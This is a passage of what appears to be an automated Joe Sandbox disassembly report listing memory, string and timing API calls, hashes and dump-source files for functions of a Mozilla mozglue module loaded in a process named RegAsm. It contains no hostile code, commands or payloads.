                                                                                      • Instruction ID: 1c2ac6c81443e3a9c29e88f3a11f6951cbd55dd914f51ebc311538799cb283dc
                                                                                      • Opcode Fuzzy Hash: 9f93ba8e7bc44d39778624ea60a597fa647cf52034f086a0f6f857c6c4cb3c16
                                                                                      • Instruction Fuzzy Hash: 29519F71A006058FE710CF69CD80BAEB3A2FF98314F298679D519A7B54D734F9068F80
                                                                                      APIs
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C12B58D,?,?,?,?,?,?,?,6C15D734,?,?,?,6C15D734), ref: 6C138E6E
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C12B58D,?,?,?,?,?,?,?,6C15D734,?,?,?,6C15D734), ref: 6C138EBF
                                                                                      • free.MOZGLUE(?,?,?,?,6C12B58D,?,?,?,?,?,?,?,6C15D734,?,?,?), ref: 6C138F24
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C12B58D,?,?,?,?,?,?,?,6C15D734,?,?,?,6C15D734), ref: 6C138F46
                                                                                      • free.MOZGLUE(?,?,?,?,6C12B58D,?,?,?,?,?,?,?,6C15D734,?,?,?), ref: 6C138F7A
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C12B58D,?,?,?,?,?,?,?,6C15D734,?,?,?), ref: 6C138F8F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: freemalloc
                                                                                      • String ID:
                                                                                      • API String ID: 3061335427-0
                                                                                      • Opcode ID: 27748e113ddae51e2ef03862cd677f5425aa3ee50b1ecf0c2e4fd4db4f1926a4
                                                                                      • Instruction ID: c8e963c873e7b458c1978f47249b41c8a5453618be798ba9051584dd7423da0b
                                                                                      • Opcode Fuzzy Hash: 27748e113ddae51e2ef03862cd677f5425aa3ee50b1ecf0c2e4fd4db4f1926a4
                                                                                      • Instruction Fuzzy Hash: 57518EB5A012268FFB14CF68D88076EB7B6AF44318F25056AD91AEB740E731F905CB91
                                                                                      APIs
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C0F5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F60F4
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C0F5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F6180
                                                                                      • free.MOZGLUE(?,?,?,?,6C0F5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0F6211
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C0F5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0F6229
                                                                                      • free.MOZGLUE(?,?,?,?,6C0F5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0F625E
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C0F5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0F6271
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: freemalloc
                                                                                      • String ID:
                                                                                      • API String ID: 3061335427-0
                                                                                      • Opcode ID: 2400fd7055df3e76df9f7c6262d9f47109bae417983fc7a92b39b5fb7fa61e53
                                                                                      • Instruction ID: 5b92838a57b15497da0436ece1b90b0671d5ebe1146a08619836088d8f38518b
                                                                                      • Opcode Fuzzy Hash: 2400fd7055df3e76df9f7c6262d9f47109bae417983fc7a92b39b5fb7fa61e53
                                                                                      • Instruction Fuzzy Hash: 2F518BB1A006068FEB14CFA8D8907AEB7F5FF49308F140539CA66D7701E731A996CB51
                                                                                      APIs
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C132620,?,?,?,6C1260AA,6C125FCB,6C1279A3), ref: 6C13284D
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C132620,?,?,?,6C1260AA,6C125FCB,6C1279A3), ref: 6C13289A
                                                                                      • free.MOZGLUE(?,?,?,6C132620,?,?,?,6C1260AA,6C125FCB,6C1279A3), ref: 6C1328F1
                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C132620,?,?,?,6C1260AA,6C125FCB,6C1279A3), ref: 6C132910
                                                                                      • free.MOZGLUE(00000001,?,?,6C132620,?,?,?,6C1260AA,6C125FCB,6C1279A3), ref: 6C13293C
                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C132620,?,?,?,6C1260AA,6C125FCB,6C1279A3), ref: 6C13294E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: freemalloc
                                                                                      • String ID:
                                                                                      • API String ID: 3061335427-0
                                                                                      • Opcode ID: 9010e143bfceb5250b73714b9022bfc8063c0f69f52b0fab360cfcf30f3bb17c
                                                                                      • Instruction ID: 430c89b23d6eabef7163650bed126d3debf54d7edfd3e962bb6a3aa2e738ebeb
                                                                                      • Opcode Fuzzy Hash: 9010e143bfceb5250b73714b9022bfc8063c0f69f52b0fab360cfcf30f3bb17c
                                                                                      • Instruction Fuzzy Hash: AE41D4B1B002268FEB20DF68D89476A73F5EF45318F150539DA5AEB741E731E904CB91
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0ECFF6
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0ED026
                                                                                      • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C0ED06C
                                                                                      • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C0ED139
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                      • String ID: MOZ_CRASH()
                                                                                      • API String ID: 1090480015-2608361144
                                                                                      • Opcode ID: b0918743ca1f804fd28c11df763b9293e5fd097b54e12fb6ba8f8ed81b518fd7
                                                                                      • Instruction ID: 9f36b5763d384ff7a8d962178dbe6a38fc3cb4858bc39f57bfc1675c721fc85e
                                                                                      • Opcode Fuzzy Hash: b0918743ca1f804fd28c11df763b9293e5fd097b54e12fb6ba8f8ed81b518fd7
                                                                                      • Instruction Fuzzy Hash: 1E41CE32B413165FCB048EAE8D9437AB6F4EF89714F140239EA18E7784D7B19D01ABC0
                                                                                      APIs
                                                                                      • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0E4E5A
                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C0E4E97
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0E4EE9
                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C0E4F02
                                                                                      • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C0E4F1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                      • String ID:
                                                                                      • API String ID: 713647276-0
                                                                                      • Opcode ID: 17cf91ad55a9af7d755b1bcd39f605ad621ff956424f19cd1bb7299d8feacc74
                                                                                      • Instruction ID: bc074cb65226c21aa7eac72c028f5eaf19ee9244dff968e7784a49add5616fa6
                                                                                      • Opcode Fuzzy Hash: 17cf91ad55a9af7d755b1bcd39f605ad621ff956424f19cd1bb7299d8feacc74
                                                                                      • Instruction Fuzzy Hash: DF41CE71648705AFC705CFA9C880A5BBBE4BF8D344F108A2DF96687B41DB30E958CB91
                                                                                      APIs
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C0F5820,?), ref: 6C12D21F
                                                                                      • moz_xmalloc.MOZGLUE(00000001,?,?,6C0F5820,?), ref: 6C12D22E
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6C0F5820,?), ref: 6C12D242
                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,6C0F5820,?), ref: 6C12D253
                                                                                        • Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
                                                                                        • Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
                                                                                        • Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2
                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6C0F5820,?), ref: 6C12D280
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2029485308-0
                                                                                      • Opcode ID: 02261ff99036f1de4b3ccf76f77fd06708d40707041b133bf500d7b4dd3c1c87
                                                                                      • Instruction ID: ebccaee4d31c191528a2bd008ed9105a34c61fa4af373ba02f3871008211bc7b
                                                                                      • Opcode Fuzzy Hash: 02261ff99036f1de4b3ccf76f77fd06708d40707041b133bf500d7b4dd3c1c87
                                                                                      • Instruction Fuzzy Hash: 0E3128B9A012158FCB00DF58C880BAEBBB5FF99308F244069D954AB701D376EC56CBE1
                                                                                      APIs
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0FC1BC
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0FC1DC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                                      • String ID:
                                                                                      • API String ID: 1885715127-0
                                                                                      • Opcode ID: 12b1a6f2150e3bbbce49d3c427f1d472227383de7e2bafc42bddd2644dce7fbf
                                                                                      • Instruction ID: 0b067e18d920b26dd759ee5adcfa55503d3b177775e9e35646b33721a277b7b7
                                                                                      • Opcode Fuzzy Hash: 12b1a6f2150e3bbbce49d3c427f1d472227383de7e2bafc42bddd2644dce7fbf
                                                                                      • Instruction Fuzzy Hash: AD4190B19083408FD720DF64C48179AB7E4FF8A708F40856EE9985B712E7319599CB92
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C16F770), ref: 6C14A858
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C14A87B
                                                                                        • Part of subcall function 6C14A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C14A88F,00000000), ref: 6C14A9F1
                                                                                      • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C14A8FF
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C14A90C
                                                                                      • LeaveCriticalSection.KERNEL32(6C16F770), ref: 6C14A97E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1355178011-0
                                                                                      • Opcode ID: 65c71823f45066996f6d0fc185bf32ae277e92abec2fe8e36d6a564dbe056e0a
                                                                                      • Instruction ID: 26ce85855d638acf5cdb9ba559556a5a530718a898c5d7e3a80a97270d9315ce
                                                                                      • Opcode Fuzzy Hash: 65c71823f45066996f6d0fc185bf32ae277e92abec2fe8e36d6a564dbe056e0a
                                                                                      • Instruction Fuzzy Hash: FD41A1B4E002089FDB00DFA4D845BEEB775FF08324F118629E826AB791D731D955CB91
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(-00000002,?,6C0F152B,?,?,?,?,6C0F1248,?), ref: 6C0F159C
                                                                                      • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0F152B,?,?,?,?,6C0F1248,?), ref: 6C0F15BC
                                                                                      • moz_xmalloc.MOZGLUE(-00000001,?,6C0F152B,?,?,?,?,6C0F1248,?), ref: 6C0F15E7
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,6C0F152B,?,?,?,?,6C0F1248,?), ref: 6C0F1606
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C0F152B,?,?,?,?,6C0F1248,?), ref: 6C0F1637
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                      • String ID:
                                                                                      • API String ID: 733145618-0
                                                                                      • Opcode ID: 82cbe475f1262dc31a53703b2d99b508ec1f3cbee215fee21d4ffd564e7b1afb
                                                                                      • Instruction ID: ba83f52bb53508cd9a1d6dc22f37926aa692fefb2eefe99ec56b956a4fec10b4
                                                                                      • Opcode Fuzzy Hash: 82cbe475f1262dc31a53703b2d99b508ec1f3cbee215fee21d4ffd564e7b1afb
                                                                                      • Instruction Fuzzy Hash: 933128B1A001048BC7188F78D85066E77E9AB857647280B2CEC33DBBD4EB30D9468791
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(00000010,?,6C0E42D2), ref: 6C0E436A
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0E42D2), ref: 6C0E4387
                                                                                      • moz_xmalloc.MOZGLUE(80000023,?,6C0E42D2), ref: 6C0E43B7
                                                                                      • free.MOZGLUE(00000000,?,6C0E42D2), ref: 6C0E43EF
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C0E42D2), ref: 6C0E4406
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 2563754823-0
                                                                                      • Opcode ID: 5961ebc945a5772b255cf96653a53f0dd39f83e29cd1ce7559055d883260b45a
                                                                                      • Instruction ID: 6d6423b4813a521c9522c0736588d3bd6ee2234bbc636d707c89360b5f91a749
                                                                                      • Opcode Fuzzy Hash: 5961ebc945a5772b255cf96653a53f0dd39f83e29cd1ce7559055d883260b45a
                                                                                      • Instruction Fuzzy Hash: B9313B72A441159FD714DEF99C8076EB7E5EF88364B240F29E825DBB80E730ED048792
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C15E330,?,6C10C059), ref: 6C14AD9D
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C15E330,?,6C10C059), ref: 6C14ADAC
                                                                                      • free.MOZGLUE(?,?,?,?,00000000,?,?,6C15E330,?,6C10C059), ref: 6C14AE01
                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,6C15E330,?,6C10C059), ref: 6C14AE1D
                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C15E330,?,6C10C059), ref: 6C14AE3D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                      • String ID:
                                                                                      • API String ID: 3161513745-0
                                                                                      • Opcode ID: d009f5e73290f9c26e308e047172b4358c56f84433cb3d39a1fd4960dec4141e
                                                                                      • Instruction ID: 70d04fc6bd09f173340fecb426658337dd04137f4e8528177680752b6d2bffa1
                                                                                      • Opcode Fuzzy Hash: d009f5e73290f9c26e308e047172b4358c56f84433cb3d39a1fd4960dec4141e
                                                                                      • Instruction Fuzzy Hash: 813132B1A002159FDB10DF75CC44BABB7F8EF49614F558429E95AE7700E734E814CBA0
                                                                                      APIs
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C140BBC
                                                                                        • Part of subcall function 6C105C50: GetTickCount64.KERNEL32 ref: 6C105D40
                                                                                        • Part of subcall function 6C105C50: EnterCriticalSection.KERNEL32(6C16F688), ref: 6C105D67
                                                                                      • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C140BCA
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C140BD5
                                                                                        • Part of subcall function 6C105C50: __aulldiv.LIBCMT ref: 6C105DB4
                                                                                        • Part of subcall function 6C105C50: LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C105DED
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C140BE2
                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C140C9A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
                                                                                      • String ID:
                                                                                      • API String ID: 3168180809-0
                                                                                      • Opcode ID: 76cd11d1ec20ff811ad4de53f5828fba38a85f1f75a8966f0dfbc5da17c340d1
                                                                                      • Instruction ID: 5522c44ed5a9c16dcc56816297b9a8538cdc81abefcae05f8e34df3a4417086f
                                                                                      • Opcode Fuzzy Hash: 76cd11d1ec20ff811ad4de53f5828fba38a85f1f75a8966f0dfbc5da17c340d1
                                                                                      • Instruction Fuzzy Hash: DE310471A047558BC714DF39889011BB7E8BF82774F118B1EF8A9A76D0EB7098488B92
                                                                                      APIs
                                                                                      • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C15DCA0,?,?,?,6C11E8B5,00000000), ref: 6C145F1F
                                                                                      • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C11E8B5,00000000), ref: 6C145F4B
                                                                                      • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C11E8B5,00000000), ref: 6C145F7B
                                                                                      • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C11E8B5,00000000), ref: 6C145F9F
                                                                                      • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C11E8B5,00000000), ref: 6C145FD6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                      • String ID:
                                                                                      • API String ID: 1389714915-0
                                                                                      • Opcode ID: aaa5e2ea448cbaf96f95995d4883ef67b7864756a34f0ea712adaa08ce5553fb
                                                                                      • Instruction ID: 655c1788de05dc5572e6e028751acd8f4f9017c5037dbd95687739ec771f4eaf
                                                                                      • Opcode Fuzzy Hash: aaa5e2ea448cbaf96f95995d4883ef67b7864756a34f0ea712adaa08ce5553fb
                                                                                      • Instruction Fuzzy Hash: DA314F343006008FD711CF29C898E2AB7F9FF99329B648598F9568BB95C735EC41DB91
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 6C0EB532
                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C0EB55B
                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0EB56B
